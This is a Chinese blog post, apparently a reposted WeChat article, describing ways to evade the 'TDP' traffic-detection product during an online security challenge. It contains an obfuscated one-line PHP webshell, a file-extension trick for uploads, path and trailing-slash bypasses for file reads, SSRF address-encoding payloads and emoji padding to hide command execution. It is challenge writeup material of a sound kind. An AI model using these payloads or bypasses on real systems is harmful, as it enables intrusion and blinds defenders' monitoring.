补档 | 某TDP挑战赛的一些思路

admin 2022年6月24日04:31:44评论46 views字数 1320阅读4分24秒阅读模式

0x01 前言


现在补个档还来得及!

为期14天的TDP线上挑战赛已经结束全部赛程,这两个星期的排行榜也变化很大。本来没有多少时间的我就只在第一个星期花了点时间,大概总共花了三个小时吧。这期间感谢@PeiQi 一直和师傅交流,也不断地提供思路给我。恭喜PeiQi师傅这次荣获第一。我在最后的一两个小时被反超,从最高的第四名到最后的第十一名,这次也是个经验与成长,所以简单的记录一下。

补档 | 某TDP挑战赛的一些思路

0x02 WriteUp

1. 逻辑漏洞

对于逻辑漏洞,TDP作为流量检测是没办法识别的。

比如:任意用户登录、用户重复注册等

不过分数相对会低很多,毕竟是Nday的利用与复现。如果是0Day,质量比较好的会有一百分以上,有加分。补档 | 某TDP挑战赛的一些思路

2. 文件上传

测试了TDP之后发现,它的一个感知会先检测文件名之后再检测文件内容

补档 | 某TDP挑战赛的一些思路

比如我们使用.php结尾会立刻被检测,我们可以使用:pHtml来绕过

对于内容,可以通过该代码绕过检测。在这里感谢PeiQi师傅提供思路

<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);

3. 任意文件读取/任意文件下载

我们打任意文件读取的时候,对于Linux经常会习惯性的etc/passwd这个对于TDP是能够检测的,比较敏感的目录他都会拦截

但是对于文件比较小的conf文件它是不会检测的补档 | 某TDP挑战赛的一些思路

4. 信息泄露

信息泄露的话,TDP对于某些目录会拦截,比如:/windows/php.ini

如果说是某个文件泄露的数据,比如管理员密码等。可以通过加一个斜杆来绕过。在推特上很多师傅发的技巧中,有很多也是通过斜杆来绕过的。

补档 | 某TDP挑战赛的一些思路

例子:

/xxx/xxx/password.conf #拦截
/xxx/xxx/password.conf/ #不拦截
补档 | 某TDP挑战赛的一些思路
补档 | 某TDP挑战赛的一些思路

5. SSRF

正常大家的绕过思路

http://127.0.0.1  >>>  http://0177.0.0.1/
http://127.0.0.1  >>>  http://2130706433/
http://192.168.0.1  >>>  http://3232235521/
http://192.168.1.1  >>>  http://3232235777/
http://[email protected]
http://www。qq。com
http://wwwqqcom
http://www.qq.com
http://dwz.cn/xxxx #短链接
http://127.0.0.1.xip.io/

等等 ... ...

在这里我们可以使用Emoji😈或者Unicode字符集,还有通过各种表情来造成脏数据。

补档 | 某TDP挑战赛的一些思路
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
(⊙﹏⊙)

6. 命令执行

下午看到PeiQi师傅已经发过了,这里也是参考的PeiQi师傅的思路

last命令是不拦截的

补档 | 某TDP挑战赛的一些思路
补档 | 某TDP挑战赛的一些思路
https://mp.weixin.qq.com/s/OcNVMNGOuVP7BUidACJSoA

我们可以通过大量的emoji进行脏数据来绕过TDP检测

😈🔪🈚🐕✔ ... ...


从现在开始,星球定价150元!日后只有慢慢涨没有跌价!现在入股不亏,持续输出原创文章,还是小有干货的!补档 | 某TDP挑战赛的一些思路

原文始发于微信公众号(不懂安全的校长):补档 | 某TDP挑战赛的一些思路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月24日04:31:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   补档 | 某TDP挑战赛的一些思路https://cn-sec.com/archives/1139118.html

发表评论

匿名网友 填写信息